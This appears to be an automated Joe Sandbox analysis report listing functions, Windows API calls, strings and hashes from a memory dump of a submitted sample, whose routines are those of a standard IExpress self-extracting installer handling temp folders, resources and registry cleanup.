TITLE, xrefs: 00FC2D09
EXTRACTOPT, xrefs: 00FC2D4D

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$smo
API String ID: 1002816675-4137116347
Opcode ID: fdd731bd1ae37482acd60bac9a90f19f2de6a273984389f73927323b054400ca
Instruction ID: e979c86bc0e8f2aa7ff9c34fa61677393b7f82d456f5becdb06b39dcb9d7c6e3
Opcode Fuzzy Hash: fdd731bd1ae37482acd60bac9a90f19f2de6a273984389f73927323b054400ca
Instruction Fuzzy Hash: B351F770B4430B6AE7A4A7218F4BF7B3698EB85760F04402DF941E61D5DBF8D841FA21

Uniqueness

Uniqueness Score: -1.00%

Function 00FC53A1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 71
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00FC171E: _vsnprintf.MSVCRT ref: 00FC1750

RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00FC53FB
GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00FC5402
GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00FC541F
DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00FC542B
CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00FC5434
CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00FC5452

Strings

IXP, xrefs: 00FC5419
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00FC53B7, 00FC53E1, 00FC541E
IXP%03d.TMP, xrefs: 00FC53C0

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$IXP$IXP%03d.TMP
API String ID: 1082909758-775753704
Opcode ID: 85fa43d595e7ea5c24ca7f514320d8a52c754ec063e1384f0a87eb53ddeceeae
Instruction ID: 7bc5bc82953392408f8108c000ac672046761814dce066e7a98022074e4415e3
Opcode Fuzzy Hash: 85fa43d595e7ea5c24ca7f514320d8a52c754ec063e1384f0a87eb53ddeceeae
Instruction Fuzzy Hash: BF11347174050867E3209B229E0BFAF366DEFC2765F00002DF546D3190CE789986A6A2

Uniqueness

Uniqueness Score: -1.00%

Function 00FC256D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00FC4096,00FC4096,?,00FC1ED3,00000001,00000000,?,?,00FC4137,?), ref: 00FC25B2
RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00FC4096,?,00FC1ED3,00000001,00000000,?,?,00FC4137,?,00FC4096), ref: 00FC25CB
RegCloseKey.KERNELBASE(?,?,00FC1ED3,00000001,00000000,?,?,00FC4137,?,00FC4096), ref: 00FC25DD
RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00FC4096,00FC4096,?,00FC1ED3,00000001,00000000,?,?,00FC4137,?), ref: 00FC25FF
RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00FC4096,00000000,00000000,00000000,00000000,?,00FC1ED3,00000001,00000000), ref: 00FC261A

Strings

System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00FC25F5
System\CurrentControlSet\Control\Session Manager, xrefs: 00FC25A8
PendingFileRenameOperations, xrefs: 00FC25C3

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: OpenQuery$CloseInfoValue
String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
API String ID: 2209512893-559176071
Opcode ID: fb58d7d7a45f7bbf56f57f2741ae127c59093e37bab376f0514ee1ea597dd169
Instruction ID: b490d50f914c8e3938850340bd210eb62913da02f3ac026263eeba7dcbe1503f
Opcode Fuzzy Hash: fb58d7d7a45f7bbf56f57f2741ae127c59093e37bab376f0514ee1ea597dd169
Instruction Fuzzy Hash: 7711603594222DBB9B20DB919E0FEFBBE6CEB417A5F144059B809A2000DB309A45F6A1

Uniqueness

Uniqueness Score: -1.00%

Function 00FC6A60 Relevance: 13.6, APIs: 9, Instructions: 138
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00FC7155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00FC7182
Part of subcall function 00FC7155: GetCurrentProcessId.KERNEL32 ref: 00FC7191
Part of subcall function 00FC7155: GetCurrentThreadId.KERNEL32 ref: 00FC719A
Part of subcall function 00FC7155: GetTickCount.KERNEL32 ref: 00FC71A3
Part of subcall function 00FC7155: QueryPerformanceCounter.KERNEL32(?), ref: 00FC71B8

GetStartupInfoW.KERNEL32(?,00FC72B8,00000058), ref: 00FC6A7F
Sleep.KERNEL32(000003E8), ref: 00FC6AB4
_amsg_exit.MSVCRT ref: 00FC6AC9
_initterm.MSVCRT ref: 00FC6B1D
__IsNonwritableInCurrentImage.LIBCMT ref: 00FC6B49
exit.KERNELBASE ref: 00FC6BBF
_ismbblead.MSVCRT ref: 00FC6BDA

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
String ID:
API String ID: 836923961-0
Opcode ID: 36af735b5b6d2ca20a435a0c3646ef51a3926c6a91a6587024ba0aaa0aff0374
Instruction ID: 6b30ed25b0f7ebc899f015b19f78a7b85f442215e142973e0ea850590cf39a18
Opcode Fuzzy Hash: 36af735b5b6d2ca20a435a0c3646ef51a3926c6a91a6587024ba0aaa0aff0374
Instruction Fuzzy Hash: B0419071D4C32B9BDB219B649F07FAA77E4EB84761F14412EE841E3291CB748C42BA91

Uniqueness

Uniqueness Score: -1.00%

Function 00FC58C8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00FC5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00FC58E7
CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00FC5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00FC5943
LocalFree.KERNEL32(00000000,?,00FC5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00FC594D
CloseHandle.KERNEL32(00000000,?,00FC5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00FC595C
GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00FC5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00FC5963

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00FC58CD, 00FC58CF, 00FC5919, 00FC5962
TMP4351$.TMP, xrefs: 00FC5923

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$TMP4351$.TMP
API String ID: 747627703-1664176527
Opcode ID: 854a2e186871fbdd50b2340dbad9db0b31af205b9328188cb42ff5ba50b20975
Instruction ID: 68b671984b3a9689dcda78c0315264064e54b9e9ba1f2199c5852cebd94c0c83
Opcode Fuzzy Hash: 854a2e186871fbdd50b2340dbad9db0b31af205b9328188cb42ff5ba50b20975
Instruction Fuzzy Hash: 8F117872A0021A6BC7241F7A5E0FF9B7E9DEF8A774B10065DF506D31C1CA74EC09A6A0

Uniqueness

Uniqueness Score: -1.00%

Function 00FC51E5 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00FC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FC46A0
Part of subcall function 00FC468F: SizeofResource.KERNEL32(00000000,00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46A9
Part of subcall function 00FC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FC46C3
Part of subcall function 00FC468F: LoadResource.KERNEL32(00000000,00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46CC
Part of subcall function 00FC468F: LockResource.KERNEL32(00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46D3
Part of subcall function 00FC468F: memcpy_s.MSVCRT ref: 00FC46E5
Part of subcall function 00FC468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00FC2F4D,?,00000002,00000000), ref: 00FC5201
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00FC5250

Part of subcall function 00FC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00FC4518
Part of subcall function 00FC44B9: MessageBoxA.USER32(?,?,smo,00010010), ref: 00FC4554

Part of subcall function 00FC6285: GetLastError.KERNEL32(00FC5BBC), ref: 00FC6285

Strings

<None>, xrefs: 00FC5262
UPROMPT, xrefs: 00FC51EF, 00FC5230

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
String ID: <None>$UPROMPT
API String ID: 957408736-2980973527
Opcode ID: 434425f2f21e175bbb7d53bfeca1a562b9332bfa4edd3d50ccfb6d6083eb7524
Instruction ID: 8b225fd91d9c29a2ba6cf16e2a969e96fb03d263d12b0a3a06b56a496924ca84
Opcode Fuzzy Hash: 434425f2f21e175bbb7d53bfeca1a562b9332bfa4edd3d50ccfb6d6083eb7524
Instruction Fuzzy Hash: C711E6B264460B6BE3146B715F5BF7B71DDEB89794B10402DBA02D6191DABDAC007224

Uniqueness

Uniqueness Score: -1.00%

Function 00FC52B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65fileCOMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNELBASE(03514D38,00000080,?,00000000), ref: 00FC52F2
DeleteFileA.KERNELBASE(03514D38), ref: 00FC52FA
LocalFree.KERNEL32(03514D38,?,00000000), ref: 00FC5305
LocalFree.KERNEL32(03514D38), ref: 00FC530C
SetCurrentDirectoryA.KERNELBASE(00FC11FC,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00FC5363

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00FC5334

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 2833751637-305352358
Opcode ID: 8e2ff582dcf2998177a611973060961c9c90ed7fd8aee4b956ded760c7d94b07
Instruction ID: 382b2fbade48dc0c40f31491da54af4c1cff79ac2e7c5036ba126c1b1291d759
Opcode Fuzzy Hash: 8e2ff582dcf2998177a611973060961c9c90ed7fd8aee4b956ded760c7d94b07
Instruction Fuzzy Hash: FC218E3190464EDFDB209B20DF0BFA977A5BB50BE4F04015DE446971A0CBB9AC89FB41

Uniqueness

Uniqueness Score: -1.00%

Function 00FC1FE1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,00FC538C,?,?,00FC538C), ref: 00FC2005
RegDeleteValueA.KERNELBASE(00FC538C,wextract_cleanup0,?,?,00FC538C), ref: 00FC2017
RegCloseKey.ADVAPI32(00FC538C,?,?,00FC538C), ref: 00FC2020

Strings

Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00FC1FFB
wextract_cleanup0, xrefs: 00FC1FE7, 00FC200F

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
API String ID: 849931509-702805525
Opcode ID: fbd07696e0cc656077c0e6bdfd9d21cf2553a41ffc041083e4b99e5167e65d71
Instruction ID: 50903ce96a35e15161117bd1a4b31cd0fb0e8ce08a6582c87327c8009bb7b2ee
Opcode Fuzzy Hash: fbd07696e0cc656077c0e6bdfd9d21cf2553a41ffc041083e4b99e5167e65d71
Instruction Fuzzy Hash: 9DE04F3099031DBBD7218B90EF0BF597B29F7407D4F140199B904A2061EBA1AA14F606

Uniqueness

Uniqueness Score: -1.00%

Function 00FC4CD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146COMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00FC4DB5
SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00FC4DDD

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00FC4D36, 00FC4DE3

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: AttributesFileItemText
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 3625706803-305352358
Opcode ID: 7dbe57dd5e8fb9ef1c03af609467289b3477a90de7f183f89b3ac9e04d432116
Instruction ID: fc184d143f4a0b4d0cd8cd2c6a6b6ac0a85cc724b314a9d28e42d7ffcc479620
Opcode Fuzzy Hash: 7dbe57dd5e8fb9ef1c03af609467289b3477a90de7f183f89b3ac9e04d432116
Instruction Fuzzy Hash: 04410636A041078ACB25AF28DF6BFF573A5AB45320F04466CD88397185DA35FD4AF750

Uniqueness

Uniqueness Score: -1.00%

Function 00FC4C37 Relevance: 4.5, APIs: 3, Instructions: 39timeCOMMON

Download Yara Rule

APIs

DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00FC4C54
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00FC4C66
SetFileTime.KERNELBASE(?,?,?,?), ref: 00FC4C7E

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: Time$File$DateLocal
String ID:
API String ID: 2071732420-0
Opcode ID: 9eb1ecbf0d937a33eaa23bcbeb679c19431d36473a8619e8a6833ec3fc522935
Instruction ID: e44f112fff0eba6a1f64a518f042ba897157fafae5ffd3a54feb50f4b928fbff
Opcode Fuzzy Hash: 9eb1ecbf0d937a33eaa23bcbeb679c19431d36473a8619e8a6833ec3fc522935
Instruction Fuzzy Hash: 32F0BB7290110D6F9B14DFB5CE5BEBB77ACEB44355744052FA416C2060EA30F918FB60

Uniqueness

Uniqueness Score: -1.00%

Function 00FC487A Relevance: 3.1, APIs: 2, Instructions: 59fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00FC4A23,?,00FC4F67,*MEMCAB,00008000,00000180), ref: 00FC48DE
CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00FC4F67,*MEMCAB,00008000,00000180), ref: 00FC4902

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 358cb98ae24bba0671eb7843fa35f37e9a5871b08030e67afdc66ebf3c36b781
Instruction ID: 2fff5782eb41507814e5bd2af74c913d34650e1a207d3dd4f53244c3ad121220
Opcode Fuzzy Hash: 358cb98ae24bba0671eb7843fa35f37e9a5871b08030e67afdc66ebf3c36b781
Instruction Fuzzy Hash: E0016DA3E1257526F32440294D9AFB7551CCBDA734F1B0338BDEAE75D1D564AC04A1E0

Uniqueness

Uniqueness Score: -1.00%

Function 00FC4AD0 Relevance: 3.0, APIs: 2, Instructions: 47fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00FC3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00FC369F
Part of subcall function 00FC3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00FC36B2
Part of subcall function 00FC3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00FC36DA

WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00FC4B05

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: MessagePeek$FileMultipleObjectsWaitWrite
String ID:
API String ID: 1084409-0
Opcode ID: dc4d16a1800ea83ab6d044a7a9380d9d104242c57198a789c281470ec25f3d86
Instruction ID: 0fc94ab27e70696a112b26d7ea843ddbc640550eacd5ec2cb0eaae7081412614
Opcode Fuzzy Hash: dc4d16a1800ea83ab6d044a7a9380d9d104242c57198a789c281470ec25f3d86
Instruction Fuzzy Hash: E801963164020A9BD7148F58DE1BFA27759F784775F088229F939971E1CB70EC12EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00FC658A Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

CharPrevA.USER32(00FC8B3E,00FC8B3F,00000001,00FC8B3E,-00000003,?,00FC60EC,00FC1140,?), ref: 00FC65BA

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: CharPrev
String ID:
API String ID: 122130370-0
Opcode ID: aeaddacdefd32057796410d1693c3b4f5f517ed3bd2290b33abe90d939c1fbfd
Instruction ID: f1f9e1a99accdcba18aafc5a72dcdc113c486809d36fb793ece0cebf22295ab9
Opcode Fuzzy Hash: aeaddacdefd32057796410d1693c3b4f5f517ed3bd2290b33abe90d939c1fbfd
Instruction Fuzzy Hash: 84F0427350C2525BD335051D9A85F66BFDD9BCA360F3C095EF8DAC3205CA555C45B3A0

Uniqueness

Uniqueness Score: -1.00%

Function 00FC621E Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00FC623F

Part of subcall function 00FC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00FC4518
Part of subcall function 00FC44B9: MessageBoxA.USER32(?,?,smo,00010010), ref: 00FC4554

Part of subcall function 00FC6285: GetLastError.KERNEL32(00FC5BBC), ref: 00FC6285

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fc0000_jtfCFDmLdX.jbxd

Similarity

API ID: DirectoryErrorLastLoadMessageStringWindows
String ID:
API String ID: 381621628-0
Opcode ID: 5684d1f58996b6cead7caed111aa7835c211bad8b8ec0c526f2dfc9fe4f5b700
Instruction ID: b56777b1193ac640da3d38552055071180415af5972dd676d2a9c8d75e69c186
Opcode Fuzzy Hash: 5684d1f58996b6cead7caed111aa7835c211bad8b8ec0c526f2dfc9fe4f5b700
Instruction Fuzzy Hash: 9AF0B4B16482096BDB50EB748F07FBA32A8DB44740F40006DB985D7091DD789944A650

Uniqueness

Uniqueness Score: -1.00%

Function 00FC4B60 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00FC4FA1,00000000), ref: 00FC4B98

Memory Dump Source

Source File: 00000000.00000002.1884535971.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1884509092.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884563685.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1884590136.0000000000FCC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

